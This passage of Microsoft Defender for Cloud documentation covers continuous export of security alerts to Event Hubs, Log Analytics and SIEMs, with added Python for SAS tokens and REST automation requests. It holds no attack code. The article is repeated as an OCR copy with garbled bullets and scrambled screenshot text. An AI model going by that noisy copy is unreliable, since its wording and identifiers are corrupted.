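the URL-encoded resource URI and expiry) is the documented Event Hubs SAS format.
"""
import base64
import hashlib
import hmac
import time
from typing import Dict, Optional
from urllib.parse import parse_qs, quote_plus

# Constructed example; a real string carries a base64 key copied from the portal.
EXAMPLE_CONNECTION_STRING = (
    "Endpoint=sb://alertstoothersiem.servicebus.windows.net/;"
    "SharedAccessKeyName=listenpolicy;"
    "SharedAccessKey=PLACEHOLDER_KEY_NOT_REAL;"
    "EntityPath=alertshub"
)


def parse_connection_string(cs: str) -> Dict[str, str]:
    """Split 'Key=Value;...' into a dict and check the parts a token needs."""
    parts: Dict[str, str] = {}
    for item in cs.strip().strip(";").split(";"):
        key, _, value = item.partition("=")
        parts[key.strip()] = value.strip()
    missing = [k for k in ("Endpoint", "SharedAccessKeyName", "SharedAccessKey")
               if not parts.get(k)]
    if missing:
        raise ValueError(f"connection string lacks {missing}")
    return parts


def resource_uri(parts: Dict[str, str], event_hub: Optional[str] = None) -> str:
    """Audience the token is scoped to: the namespace host plus one event hub.
    Scoping to the hub rather than the namespace limits what a leaked token reaches."""
    host = parts["Endpoint"].split("://", 1)[-1].rstrip("/")
    hub = event_hub or parts.get("EntityPath")
    if not hub:
        raise ValueError("no event hub given and no EntityPath in the connection string")
    return f"https://{host}/{hub}"


def _sign(key: str, encoded_uri: str, expiry: int) -> str:
    string_to_sign = f"{encoded_uri}\n{expiry}".encode()
    digest = hmac.new(key.encode(), string_to_sign, hashlib.sha256).digest()
    return base64.b64encode(digest).decode()


def make_sas_token(parts: Dict[str, str], event_hub: Optional[str] = None,
                   ttl_seconds: int = 3600, now: Optional[float] = None) -> str:
    """SharedAccessSignature sr=<uri>&sig=<hmac>&se=<expiry>&skn=<policy name>."""
    encoded_uri = quote_plus(resource_uri(parts, event_hub))
    expiry = int((time.time() if now is None else now) + ttl_seconds)
    sig = _sign(parts["SharedAccessKey"], encoded_uri, expiry)
    return (f"SharedAccessSignature sr={encoded_uri}&sig={quote_plus(sig)}"
            f"&se={expiry}&skn={parts['SharedAccessKeyName']}")


def verify_sas_token(token: str, key: str, now: Optional[float] = None) -> bool:
    """Recompute the signature for the token's own sr/se, compare in constant
    time and reject expired tokens (the check the service performs)."""
    prefix = "SharedAccessSignature "
    if not token.startswith(prefix):
        return False
    q = parse_qs(token[len(prefix):])
    try:
        sr, sig, se = q["sr"][0], q["sig"][0], int(q["se"][0])
    except (KeyError, ValueError):
        return False
    if se <= (time.time() if now is None else now):
        return False
    expected = _sign(key, quote_plus(sr), se)
    return hmac.compare_digest(expected, sig)
```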


Step 4: Enable continuous export for the scope of the alerts


1. In the Azure search box, search for "policy" and go to the Policy.
2. In the Policy menu, select Definitions.
3. Search for "deploy export" and select the Deploy export to Event Hub for Microsoft Defender for Cloud data built-in policy.
4. Select Assign.
5. Define the basic policy options:
   a. In Scope, select the ... to select the scope to apply the policy to.
   b. Find the root management group (for tenant scope), management group, subscription, or resource group in the scope and select Select.
      • To select a tenant root management group level you need to have permissions on tenant level.
   c. (Optional) In Exclusions you can define specific subscriptions to exclude from the export.
   d. Enter an assignment name.
   e. Make sure policy enforcement is enabled.


[Screenshot: the Assign policy page for Deploy export to Event Hub for Azure Security Center data, Basics tab]


6. In the policy parameters:
   a. Enter the resource group where the automation resource is saved.
   b. Select resource group location.
   c. Select the ... next to the Event Hub details and enter the details for the event hub, including:
      • Subscription.
      • The Event Hubs namespace you created.
      • The event hub you created.
      • In authorizationrules, select the shared access policy that you created to send alerts.


[Screenshot: the Event Hub details pane on the Parameters tab of the Deploy export to Event Hub for Azure Security Center data policy assignment]


7. Select Review and Create and Create to finish the process of defining the 
continuous export to Event Hubs. 


• Notice that when you activate continuous export policy on the tenant (root management group level), it automatically streams your alerts on any new subscription that will be created under this tenant.


Step 5: For streaming alerts to QRadar SIEM - Create a storage account


1. Go to the Azure portal, select Create a resource, and select Storage account. If 
that option isn't shown, search for "storage account". 


2. Select Create. 


3. Enter the details for the storage account, select Review and Create, and then Create.

[Screenshot: the Create a storage account page, Project details section]


4. After you create your storage account and go to the resource, in the menu select 
Access Keys. 


5. Select Show keys to see the keys, and copy the connection string of Key 1. 


[Screenshot: exporttoothersiem | Access keys, showing the key1 connection string]


Step 6: For streaming alerts to Splunk SIEM - Create a Microsoft Entra application


1. In the menu search box, search for "Microsoft Entra ID" and go to Microsoft Entra 
ID. 


2. Go to the Azure portal, select Create a resource, and select Microsoft Entra ID. If 
that option isn't shown, search for "active directory". 


3. In the menu, select App registrations. 

4. Select New registration. 

5. Enter a unique name for the application and select Register. 
[Screenshot: Register an application]


6. Copy to Clipboard and save the Application (client) ID and Directory (tenant) ID. 


7. Create the client secret for the application: 


a. In the menu, go to Certificates & secrets. 

b. Create a password for the application to prove its identity when requesting a 
token: 

c. Select New client secret. 

d. Enter a short description, choose the expiration time of the secret, and select 
Add. 


[Screenshot: exporttosiem | Certificates & secrets, Add a client secret]


8. After the secret is created, copy the Secret ID and save it for later use together with 
the Application ID and Directory (tenant) ID. 


Step 7: For streaming alerts to Splunk SIEM - Allow Microsoft Entra ID to read from the event hub


1. Go to the Event Hubs namespace you created. 
2. In the menu, go to Access control. 
3. Select Add and select Add role assignment. 


4. Select Add role assignment. 


[Screenshot: alertstootherSIEM | Access control (IAM), Add role assignment]


5. In the Roles tab, search for Azure Event Hubs Data Receiver. 

6. Select Next. 

7. Select Select Members. 

8. Search for the Microsoft Entra application you created before and select it. 
9. Select Close. 


To continue setting up export of alerts, install the built-in connectors for the SIEM you're using.


Continuously export Microsoft Defender for Cloud data

Article • 07/10/2023


Microsoft Defender for Cloud generates detailed security alerts and recommendations. 
To analyze the information in these alerts and recommendations, you can export them 
to Azure Log Analytics, Event Hubs, or to another SIEM, SOAR, or IT classic deployment 
model solution. You can stream the alerts and recommendations as they're generated or 
define a schedule to send periodic snapshots of all of the new data. 


With continuous export, you can fully customize what information to export and where 
it goes. For example, you can configure it so that: 


• All high severity alerts are sent to an Azure event hub

• All medium or higher severity findings from vulnerability assessment scans of your SQL servers are sent to a specific Log Analytics workspace

• Specific recommendations are delivered to an event hub or Log Analytics workspace whenever they're generated

• The secure score for a subscription is sent to a Log Analytics workspace whenever the score for a control changes by 0.01 or more

This article describes how to configure continuous export to Log Analytics workspaces or Azure event hubs.

Tip

Defender for Cloud also offers the option to perform a one-time, manual export to CSV. Learn more in Manual one-time export of alerts and recommendations.


Availability

Aspect                          Details
Release state:                  General availability (GA)
Pricing:                        Free
Required roles and permissions: • Security admin or Owner on the resource group
                                • Write permissions for the target resource.
                                • If you're using the Azure Policy 'DeployIfNotExist' policies, you need the permissions that allow you to assign policies
                                • To export data to Event Hubs, you need Write permission on the Event Hubs Policy.
                                • To export to a Log Analytics workspace:
                                  ◦ if it has the SecurityCenterFree solution, you need a minimum of read permissions for the workspace solution: Microsoft.OperationsManagement/solutions/read
                                  ◦ if it doesn't have the SecurityCenterFree solution, you need write permissions for the workspace solution: Microsoft.OperationsManagement/solutions/action
                                  ◦ Learn more about Azure Monitor and Log Analytics workspace solutions
Clouds:                         • Commercial clouds
                                • National (Azure Government, Azure China 21Vianet)


What data types can be exported? 


Continuous export can export the following data types whenever they change: 


• Security alerts.

• Security recommendations.

• Security findings. Findings can be thought of as 'sub' recommendations and belong to a 'parent' recommendation. For example:

  ◦ The recommendations System updates should be installed on your machines (powered by Update Center) and System updates should be installed on your machines each have one 'sub' recommendation per outstanding system update.

  ◦ The recommendation Machines should have vulnerability findings resolved has a 'sub' recommendation for every vulnerability identified by the vulnerability scanner.

  Note

  If you're configuring a continuous export with the REST API, always include the parent with the findings.

• Secure score per subscription or per control.

• Regulatory compliance data.


Set up a continuous export 


You can configure continuous export from the Microsoft Defender for Cloud pages in 
Azure portal, via the REST API, or at scale using the supplied Azure Policy templates. 


Use the Azure portal 


Configure continuous export from the Defender for Cloud pages in Azure portal

If you're setting up a continuous export to Log Analytics or Azure Event Hubs:

1. From Defender for Cloud's menu, open Environment settings.

2. Select the specific subscription for which you want to configure the data export.

3. From the sidebar of the settings page for that subscription, select Continuous export.


[Screenshot: Settings | Continuous export page with the Event hub and Log Analytics workspace tabs, the Export enabled toggle, exported data types (security recommendations, secure score, security alerts, regulatory compliance), export frequency (streaming updates, snapshots), the export configuration resource group, and the export target fields (subscription, Event Hub namespace, Event Hub name, Event hub policy name)]


Here you see the export options. There's a tab for each available export target, 
either event hub or Log Analytics workspace. 


4. Select the data type you'd like to export and choose from the filters on each type (for example, export only high severity alerts).

5. Select the export frequency:

   • Streaming: assessments are sent when a resource's health state is updated (if no updates occur, no data is sent).

   • Snapshots: a snapshot of the current state of the selected data types that are sent once a week per subscription. To identify snapshot data, look for the field IsSnapshot.

   If your selection includes one of these recommendations, you can include the vulnerability assessment findings together with them:

   • SQL databases should have vulnerability findings resolved
   • SQL servers on machines should have vulnerability findings resolved
   • Container registry images should have vulnerability findings resolved (powered by Qualys)
   • Machines should have vulnerability findings resolved
   • System updates should be installed on your machines

   To include the findings with these recommendations, enable the include security findings option.


[Screenshot: Settings | Continuous export page with Security recommendations selected, the Recommendation severity filter, and the Include security findings toggle]


6. From the "Export target" area, choose where you'd like the data saved. Data can be saved in a target of a different subscription (for example, on a central Event Hubs instance or a central Log Analytics workspace).

   You can also send the data to an Event Hubs or Log Analytics workspace in a different tenant.

7. Select Save.

Note

Log Analytics supports records that are only up to 32 KB in size. When the data limit is reached, you will see an alert telling you that the Data limit has been exceeded.


Exporting to a Log Analytics workspace 


If you want to analyze Microsoft Defender for Cloud data inside a Log Analytics 
workspace or use Azure alerts together with Defender for Cloud alerts, set up 
continuous export to your Log Analytics workspace. 


Log Analytics tables and schemas 


Security alerts and recommendations are stored in the SecurityAlert and 
SecurityRecommendation tables respectively. 


The name of the Log Analytics solution containing these tables depends on whether you've enabled the enhanced security features: Security ('Security and Audit') or SecurityCenterFree.

Tip

To see the data on the destination workspace, you must enable one of these solutions: Security and Audit or SecurityCenterFree.


[Screenshot: Log Analytics workspace table list with the Security solution expanded, containing the SecurityAlert table]


To view the event schemas of the exported data types, visit the Log Analytics table schemas.


Export data to an Azure Event Hubs or Log Analytics workspace in another tenant

You cannot configure data to be exported to a Log Analytics workspace in another tenant when using Azure Policy to assign the configuration. This process only works with the REST API, and the configuration is unsupported in the Azure portal (due to requiring multitenant context). Azure Lighthouse does not resolve this issue with Policy, although you can use Lighthouse as the authentication method.


When collecting data into a tenant, you can analyze the data from one central location. 
To export data to an Azure Event Hubs or Log Analytics workspace in a different tenant: 


1. In the tenant that has the Azure Event Hubs or Log Analytics workspace, invite a 
user from the tenant that hosts the continuous export configuration, or 
alternatively configure Azure Lighthouse for the source and destination tenant. 

2. If using Azure AD B2B Guest access, ensure that the user accepts the invitation to 
access the tenant as a guest. 

3. If you're using a Log Analytics Workspace, assign the user in the workspace tenant 
one of these roles: Owner, Contributor, Log Analytics Contributor, Sentinel 
Contributor, or Monitoring Contributor. 

4. Create and submit the request to the Azure REST API to configure the required 
resources. You'll need to manage the bearer tokens in both the context of the local 
(workspace) and the remote (continuous export) tenant. 
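The request in step 4, and the earlier note that a REST API export must include the parent recommendation with its findings, both come down to one PUT on a Microsoft.Security/automations resource. As an added example (not Microsoft's code), this Python builds that request for the article's first scenario (all high severity alerts to an event hub), supports a Log Analytics workspace target as well, and rejects a findings-only configuration; the automations request shape, the severity JSON paths, the api-version and every ID and token are my assumptions and placeholders.

```python
"""Added example (not Microsoft's code): build and submit the automation resource
behind a Defender for Cloud continuous export over the Azure REST API.
Assumptions not taken from the article: the Microsoft.Security/automations request
shape (api-version 2019-01-01-preview) as I know it, the severity JSON paths, and
every ID/token below, which is a placeholder. Check the current API reference."""
import json
import urllib.request
from typing import Any

ARM_BASE = "https://management.azure.com"
API_VERSION = "2019-01-01-preview"
# Event sources the automations API accepts (assumption, see docstring).
EVENT_SOURCES = {"Alerts", "Assessments", "SubAssessments", "SecureScores",
                 "SecureScoreControls", "RegulatoryComplianceAssessment"}
# The article's REST API note: findings (SubAssessments) go together with
# their parent recommendation (Assessments).
PARENT_SOURCE = {"SubAssessments": "Assessments"}
# JSON path of the severity field inside each exported object (assumption).
SEVERITY_PATH = {"Alerts": "Severity", "Assessments": "properties.metadata.severity"}


def automation_url(subscription_id: str, resource_group: str, name: str) -> str:
    """ARM URL of the automation; the subscription is the one being exported."""
    return (f"{ARM_BASE}/subscriptions/{subscription_id}/resourceGroups/{resource_group}"
            f"/providers/Microsoft.Security/automations/{name}?api-version={API_VERSION}")


def severity_rule_sets(event_source: str, severities: list[str]) -> list[dict[str, Any]]:
    """One ruleSet per severity: ruleSets are OR-ed and the rules inside one set
    are AND-ed, so 'High or Medium' needs two single-rule sets."""
    path = SEVERITY_PATH.get(event_source)
    if path is None or not severities:
        return []  # no filter: every object of this source is exported
    return [{"rules": [{"propertyJPath": path, "propertyType": "String",
                        "expectedValue": sev, "operator": "Equals"}]} for sev in severities]


def event_hub_action(event_hub_resource_id: str, connection_string: str) -> dict[str, str]:
    """Target: an event hub, authorised by the SAS send policy's connection string."""
    return {"actionType": "EventHub", "eventHubResourceId": event_hub_resource_id,
            "connectionString": connection_string}


def workspace_action(workspace_resource_id: str) -> dict[str, str]:
    """Target: a Log Analytics workspace, possibly in another tenant."""
    return {"actionType": "Workspace", "workspaceResourceId": workspace_resource_id}


def build_automation(*, location: str, scope_path: str, sources: dict[str, list[str]],
                     action: dict[str, str], description: str = "Continuous export") -> dict[str, Any]:
    """Request body. `sources` maps an event source to the severities to keep
    (empty list = no filter). Rejects findings requested without their parent."""
    unknown = set(sources) - EVENT_SOURCES
    if unknown:
        raise ValueError(f"unknown event source(s): {sorted(unknown)}")
    for child, parent in PARENT_SOURCE.items():
        if child in sources and parent not in sources:
            raise ValueError(f"{child} must be exported together with {parent}")
    return {"location": location, "properties": {
        "description": description, "isEnabled": True,
        "scopes": [{"description": "exported scope", "scopePath": scope_path}],
        "sources": [{"eventSource": src, "ruleSets": severity_rule_sets(src, sev)}
                    for src, sev in sources.items()],
        "actions": [action]}}


def build_request(url: str, body: dict[str, Any], bearer_token: str) -> urllib.request.Request:
    """PUT carrying a bearer token for the tenant that owns the exported scope; the
    target tenant grants access separately through the role assignment in step 3."""
    return urllib.request.Request(url, data=json.dumps(body).encode(), method="PUT",
                                  headers={"Authorization": f"Bearer {bearer_token}",
                                           "Content-Type": "application/json"})


def submit(req: urllib.request.Request, timeout: float = 30) -> int:
    """Send the request and return the HTTP status (needs network; not run here)."""
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    sub = "<exported-subscription-id>"  # placeholder
    body = build_automation(
        location="westeurope", scope_path=f"/subscriptions/{sub}",
        sources={"Alerts": ["High"]},  # the article's first scenario
        action=event_hub_action("/subscriptions/<target-sub>/resourceGroups/<rg>/providers"
                                "/Microsoft.EventHub/namespaces/<ns>/eventhubs/<hub>",
                                "<SAS connection string of the send policy>"))
    req = build_request(automation_url(sub, "<rg>", "ExportHighAlerts"), body, "<bearer token>")
    print(req.get_method(), req.full_url)
    print(json.dumps(body, indent=2))
```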


Continuously export to an event hub behind a firewall


You can enable continuous export as a trusted service, so that you can send data to an 
event hub that has an Azure Firewall enabled. 


To grant access to continuous export as a trusted service:

1. Sign in to the Azure portal.
2. Navigate to Microsoft Defender for Cloud > Environment settings.
3. Select the relevant resource.
4. Select Continuous export.
5. Select Export as a trusted service.


[Screenshot: Settings | Continuous export page showing export frequency, the export configuration resource group, and the export target fields (subscription, Event Hub namespace, Event Hub name, Event hub policy name)]


You need to add the relevant role assignment on the destination Event Hubs. To add the relevant role assignment on the destination Event Hub:

1. Navigate to the selected Event Hubs.

2. Select Access Control > Add role assignment.


[Screenshot: contososiempipe-ns | Access control (IAM) page of the Event Hubs namespace]


3. Select Azure Event Hubs Data Sender. 
4. Select the Members tab. 


5. Select + Select members. 


[Screenshot: Access control (IAM) page with the Add role assignment option, Check access, and Grant access to this resource]


6. Search for and select Windows Azure Security Resource Provider. 


[Screenshot: Add role assignment with Selected role Azure Event Hubs Data Sender, Assign access to User, group, or service principal, and the Select members search for windows azure security resource provider]


7. Select Review + assign. 




Select Close 


View exported alerts and recommendations in Azure Monitor


You might also choose to view exported Security Alerts and/or recommendations in 
Azure Monitor. 


Azure Monitor provides a unified alerting experience for various Azure alerts including 
Diagnostic Log, Metric alerts, and custom alerts based on Log Analytics workspace 
queries. 


To view alerts and recommendations from Defender for Cloud in Azure Monitor, 
configure an Alert rule based on Log Analytics queries (Log Alert): 


1. From Azure Monitor's Alerts page, select New alert rule. 


[Screenshot: Azure Monitor Alerts page with the New alert rule button]


2. In the create rule page, configure your new rule (in the same way you'd configure a 
log alert rule in Azure Monitor): 


   • For Resource, select the Log Analytics workspace to which you exported security alerts and recommendations.

   • For Condition, select Custom log search. In the page that appears, configure the query, lookback period, and frequency period. In the search query, you can type SecurityAlert or SecurityRecommendation to query the data types that Defender for Cloud continuously exports to as you enable the Continuous export to Log Analytics feature.

   • Optionally, configure the Action Group that you'd like to trigger. Action groups can trigger email sending, ITSM tickets, WebHooks, and more.


[Screenshot: Create rule page with Resource hierarchy, Condition (Whenever the Custom log search is Greater than 0 count), Actions (action group), and Alert details (alert rule name MicrosoftDefenderforCloudAlertRule, description, severity, Enable rule upon creation)]


The Microsoft Defender for Cloud alerts or recommendations appear (depending on your configured continuous export rules and the condition you defined in your Azure Monitor alert rule) in Azure Monitor alerts, with automatic triggering of an action group (if provided).


Manual one-time export of alerts and recommendations


To download a CSV report for alerts or recommendations, open the Security alerts or 
Recommendations page and select the Download CSV report button. 


Tip


Due to Azure Resource Graph limitations, the reports are limited to a file size of 13K 
rows. If you're seeing errors related to too much data being exported, try limiting 
the output by selecting a smaller set of subscriptions to be exported. 


[Screenshot: Microsoft Defender for Cloud | Security alerts page with the Download CSV report button]


These reports contain alerts and recommendations for resources from the currently selected subscriptions.


Next steps 


In this article, you learned how to configure continuous exports of your recommendations and alerts. You also learned how to download your alerts data as a CSV file.

For related material, see the following documentation:

• Learn more about workflow automation templates.
• Azure Event Hubs documentation
• Microsoft Sentinel documentation
• Azure Monitor documentation
• Export data types schemas
• Check out common questions about continuous export.


Continuously export Microsoft Defender 
for Cloud data 


Article e 07/10/2023 


Microsoft Defender for Cloud generates detailed security alerts and recommendations. 
To analyze the information in these alerts and recommendations, you can export them 
to Azure Log Analytics, Event Hubs, or to another SIEM, SOAR, or IT classic deployment 
model solution. You can stream the alerts and recommendations as they're generated or 
define a schedule to send periodic snapshots of all of the new data. 


With continuous export, you can fully customize what information to export and where 
it goes. For example, you can configure it so that: 


e All high severity alerts are sent to an Azure event hub 

e All medium or higher severity findings from vulnerability assessment scans of your 
SQL servers are sent to a specific Log Analytics workspace 

e Specific recommendations are delivered to an event hub or Log Analytics 
workspace whenever they're generated 

e The secure score for a subscription is sent to a Log Analytics workspace whenever 
the score for a control changes by 0.01 or more 


This article describes how to configure continuous export to Log Analytics workspaces 


or Azure event hubs. 


Q Tip 


Defender for Cloud also offers the option to perform a one-time, manual export to 


CSV. Learn more in Manual one-time export of alerts and recommendations. 


Availability 


Aspect Details 

Release state: General availability (GA) 

Pricing: Free 

Required roles e Security admin or Owner on the resource group 

and e Write permissions for the target resource. 

permissions: e If you're using the Azure Policy 'DeploylfNotExist’ policies, you need the 


permissions that allow you to assign policies 


Aspect Details 


e To export data to Event Hubs, you need Write permission on the Event 
Hubs Policy. 
e To export to a Log Analytics workspace: 
o if it has the SecurityCenterFree solution, you need a minimum of 
read permissions for the workspace solution: 
Microsoft .OperationsManagement/solutions/read 
o if it doesn't have the SecurityCenterFree solution, you need write 
permissions for the workspace solution: 
Microsoft .OperationsManagement/solutions/action 
o Learn more about Azure Monitor and Log Analytics workspace 
solutions 


Clouds: © Commercial clouds 
© National (Azure Government, Azure China 21Vianet) 


What data types can be exported? 


Continuous export can export the following data types whenever they change: 


e Security alerts. 

e Security recommendations. 

e Security findings. Findings can be thought of as ‘sub’ recommendations and 
belong to a 'parent' recommendation. For example: 

o The recommendations System updates should be installed on your machines 
(powered by Update Center)“ and System updates should be installed on your 
machines? each has one 'sub' recommendation per outstanding system 
update. 

o The recommendation Machines should have vulnerability findings resolved £ 
has a 'sub' recommendation for every vulnerability identified by the vulnerability 
scanner. 


O Note 


If you're configuring a continuous export with the REST API, always include 
the parent with the findings. 


e Secure score per subscription or per control. 
e Regulatory compliance data. 


Set up a continuous export 


You can configure continuous export from the Microsoft Defender for Cloud pages in 
Azure portal, via the REST API, or at scale using the supplied Azure Policy templates. 


Use the Azure portal 


Configure continuous export from the Defender for 
Cloud pages in Azure portal 


If you're setting up a continuous export to Log Analytics or Azure Event Hubs: 
1. From Defender for Cloud's menu, open Environment settings. 


2. Select the specific subscription for which you want to configure the data 
export. 


3. From the sidebar of the settings page for that subscription, select Continuous 


export. 


Settings | Continuous export 


Contoso Hotels Tenant - Production 


[e Search (Ctrl+/) 


Settings 

F Defender plans 

~ Auto provisioning 

@ Email notifications 
GO Integrations 

ZA Workflow automation 
Policy settings 

©: Security policy 


© Governance rules (preview) 


[a=] 


A You have limited permissions to the export target subscription, this may affect the accuracy of the data showing below. 


= Continuous export 


Configure streaming export setting of Defender for Cloud data to multiple export targets. 
Exporting Defender for Cloud's data also enables you to use experiences such as integration with 3rd-party SIEM and Azure Data Explorer. 


Learn More > 


Event hub Log Analytics workspace 


Export enabled K on J ) 


Exported data types 
E Security recommendations 
Recommendation severity * 
Include security findings © 
@ Secure score @ 
Controls 


E Security alerts 


@ Regulatory compliance 


Export frequency 


E streaming updates © 


@ Snapshots (Preview) © 


ECunart erti ean rrien 


The resource group where this export configuration will reside 


Resource group * © 


Export target 
Subscription * 

Event Hub namespace * 
Event Hub name * 


Event hub policy name * 


All recommendations selected Vv 


Low,Medium,High VY 


Overall score,Control score s 
All controls selected M 
Low,Medium,High,Informational Vv 
All standards selected KA 


Select resource group W 


Contoso Hotels Tenant - Production V 


Select Event Hub namespace V 


Select Event Hub W | QA 


Select Event Hub policy name V 


Here you see the export options. There's a tab for each available export target, 
either event hub or Log Analytics workspace. 


4. Select the data type you'd like to export and choose from the filters on each 
type (for example, export only high severity alerts). 


5. Select the export frequency: 


e Streaming — assessments are sent when a resource’s health state is 
updated (if no updates occur, no data is sent). 

e Snapshots — a snapshot of the current state of the selected data types 
that are sent once a week per subscription. To identify snapshot data, 
look for the field IsSnapshot . 


If your selection includes one of these recommendations, you can include the 
vulnerability assessment findings together with them: 


e SQL databases should have vulnerability findings resolved Z 

e SQL servers on machines should have vulnerability findings resolved Z 

e Container registry images should have vulnerability findings resolved 
(powered by Qualys) £ 

e Machines should have vulnerability findings resolved £ 

e System updates should be installed on your machines E 


To include the findings with these recommendations, enable the include 
security findings option. 


Settings | Continuous export 


Contoso 


P Search (Ctrl+/) | « 


Settings 


©) Pricing tier E Continuous export 


© Data Collection 
Configure streaming export setting of Security alerts and recommendations to multiple export targets, 

@ Email notifications Exporting Microsoft Defender for Cloud's data also enables you to use experiences such as integration with 3rd-party SIEM and Azure Data Explorer. 
Learn More > 

© Threat detection 


ZA Workflow automation Event hub Log Analytics workspace 


E Continuous export ————— 
Export enabled On off J 


Exported data types 


E security recommendations All recommendations sele.. V 


Recommendation severity No selected severities M 


Include security findings ( | Dv 


6. From the "Export target" area, choose where you'd like the data saved. Data 
can be saved in a target of a different subscription (for example, on a Central 
Event Hubs instance or a central Log Analytics workspace). 


You can also send the data to an Event hubs or Log Analytics workspace ina 
different tenant. 


7. Select Save. 


O Note 


Log analytics supports records that are only up to 32KB in size. When the data 
limit is reached, you will see an alert telling you that the Data limit has been 


exceeded. 


Exporting to a Log Analytics workspace 


If you want to analyze Microsoft Defender for Cloud data inside a Log Analytics 
workspace or use Azure alerts together with Defender for Cloud alerts, set up 
continuous export to your Log Analytics workspace. 


Log Analytics tables and schemas 


Security alerts and recommendations are stored in the SecurityAlert and 
SecurityRecommendation tables respectively. 


The name of the Log Analytics solution containing these tables depends on whether 
you've enabled the enhanced security features: Security (‘Security and Audit’) or 


SecurityCenterFree. 


Q Tip 


To see the data on the destination workspace, you must enable one of these 


solutions Security and Audit or SecurityCenterFree. 


Active 

v É) Ins 
>» ChangeTracking 
> Containerlnsights 


> Containers 


v 


LogManagement 
v Security 
> H CommonSecurityLog 
> E LinuxAuditLog 
> H ProtectionStatus 
> E SecurityAlert 
> H SecurityBaseline b 


To view the event schemas of the exported data types, visit the Log Analytics table 


schemas Z . 


Export data to an Azure Event Hubs or Log 
Analytics workspace in another tenant 


You cannot configure data to be exported to a log analytics workspace in another 
tenant when using Azure Policy to assign the configuration. This process only works with 
the REST API, and the configuration is unsupported in the Azure portal (due to requiring 


multitenant context). Azure Lighthouse does not resolve this issue with Policy, although 
you can use Lighthouse as the authentication method. 


When collecting data into a tenant, you can analyze the data from one central location. 
To export data to an Azure Event Hubs or Log Analytics workspace in a different tenant: 


1. In the tenant that has the Azure Event Hubs or Log Analytics workspace, invite a 
user from the tenant that hosts the continuous export configuration, or 
alternatively configure Azure Lighthouse for the source and destination tenant. 

2. If using Azure AD B2B Guest access, ensure that the user accepts the invitation to 
access the tenant as a guest. 

3. If you're using a Log Analytics Workspace, assign the user in the workspace tenant 
one of these roles: Owner, Contributor, Log Analytics Contributor, Sentinel 
Contributor, or Monitoring Contributor. 

4. Create and submit the request to the Azure REST API to configure the required 
resources. You'll need to manage the bearer tokens in both the context of the local 
(workspace) and the remote (continuous export) tenant. 


Continuously export to an event hub behind a 
firewall 


You can enable continuous export as a trusted service, so that you can send data to an 
event hub that has an Azure Firewall enabled. 


To grant access to continuous export as a trusted service:

1. Sign in to the Azure portal.
2. Navigate to Microsoft Defender for Cloud > Environmental settings.
3. Select the relevant resource.
4. Select Continuous export.
5. Select Export as a trusted service.


[Screenshot: the Settings > Continuous export page, showing the Export configuration and Export target fields (Subscription, Event Hub namespace, Event Hub name, Event hub policy name)]


You need to add the relevant role assignment on the destination Event Hubs. To add the relevant role assignment on the destination Event Hub:

1. Navigate to the selected Event Hubs.
2. Select Access Control > Add role assignment.


[Screenshot: the Access control (IAM) page of the contososiempipe-ns Event Hubs namespace]


3. Select Azure Event Hubs Data Sender.
4. Select the Members tab.
5. Select + Select members.


[Screenshot: the Access control (IAM) page with the Add role assignment option and the Check access, Role assignments, Roles, and Deny assignments tabs]


6. Search for and select Windows Azure Security Resource Provider. 


[Screenshot: the Add role assignment page with Azure Event Hubs Data Sender selected, searching members for "windows azure security resource provider"]


7. Select Review + assign. 




View exported alerts and recommendations in Azure Monitor


You might also choose to view exported Security Alerts and/or recommendations in 
Azure Monitor. 


Azure Monitor provides a unified alerting experience for various Azure alerts including 
Diagnostic Log, Metric alerts, and custom alerts based on Log Analytics workspace 
queries. 


To view alerts and recommendations from Defender for Cloud in Azure Monitor, 
configure an Alert rule based on Log Analytics queries (Log Alert): 


1. From Azure Monitor's Alerts page, select New alert rule. 


[Screenshot: the Azure Monitor Alerts page with the New alert rule button]


2. In the create rule page, configure your new rule (in the same way you'd configure a 
log alert rule in Azure Monitor): 


e For Resource, select the Log Analytics workspace to which you exported 
security alerts and recommendations. 


e For Condition, select Custom log search. In the page that appears, configure the query, lookback period, and frequency period. In the search query, you can type SecurityAlert or SecurityRecommendation to query the data types that Defender for Cloud continuously exports once you enable the Continuous export to Log Analytics feature.


e Optionally, configure the Action Group that you'd like to trigger. Action 
groups can trigger email sending, ITSM tickets, WebHooks, and more. 


[Screenshot: the Azure Monitor Create rule page with the Resource, Condition (Custom log search), Actions, and Alert details sections, using the rule name MicrosoftDefenderforCloudAlertRule]


The Microsoft Defender for Cloud alerts or recommendations appear (depending on your configured continuous export rules and the condition you defined in your Azure Monitor alert rule) in Azure Monitor alerts, with automatic triggering of an action group (if provided).


Manual one-time export of alerts and recommendations


To download a CSV report for alerts or recommendations, open the Security alerts or 
Recommendations page and select the Download CSV report button. 


Tip

Due to Azure Resource Graph limitations, the reports are limited to a file size of 13K rows. If you're seeing errors related to too much data being exported, try limiting the output by selecting a smaller set of subscriptions to be exported.


[Screenshot: the Security alerts page showing active alerts with their affected resource, activity start time, MITRE ATT&CK tactics, and status, and the Download CSV report button]


These reports contain alerts and recommendations for resources from the currently selected subscriptions.


Next steps 


In this article, you learned how to configure continuous exports of your recommendations and alerts. You also learned how to download your alerts data as a CSV file.

For related material, see the following documentation:

e Learn more about workflow automation templates.
e Azure Event Hubs documentation
e Microsoft Sentinel documentation
e Azure Monitor documentation
e Export data types schemas
e Check out common questions about continuous export.


Security alerts schemas 
If your subscription has Defender for Cloud Defender plans enabled, you'll receive
security alerts when Defender for Cloud detects threats to their resources. 


You can view these security alerts in Microsoft Defender for Cloud's pages - overview dashboard, alerts, resource health pages, or workload protections dashboard - and through external tools such as:


e Microsoft Sentinel - Microsoft's cloud-native SIEM. The Sentinel Connector gets alerts from Microsoft Defender for Cloud and sends them to the Log Analytics workspace for Microsoft Sentinel.

e Third-party SIEMs - Send data to Azure Event Hubs. Then integrate your Event Hub data with a third-party SIEM. Learn more in Stream alerts to a SIEM, SOAR, or IT Service Management solution.

e The REST API - If you're using the REST API to access alerts, see the online Alerts API documentation.


If you're using any programmatic methods to consume the alerts, you'll need the correct 
schema to find the fields that are relevant to you. Also, if you're exporting to an Event 
Hub or trying to trigger Workflow Automation with generic HTTP connectors, use the 
schemas to properly parse the JSON objects. 


Important

The schema is slightly different for each of these scenarios, so make sure you select the relevant tab below.


The schemas 


Microsoft Sentinel 


The Sentinel Connector gets alerts from Microsoft Defender for Cloud and sends 
them to the Log Analytics Workspace for Microsoft Sentinel. 


To create a Microsoft Sentinel case or incident using Defender for Cloud alerts, 
you'll need the schema for those alerts shown below. 


Learn more in the Microsoft Sentinel documentation. 


The data model of the schema

Field | Description
AlertName | Alert display name
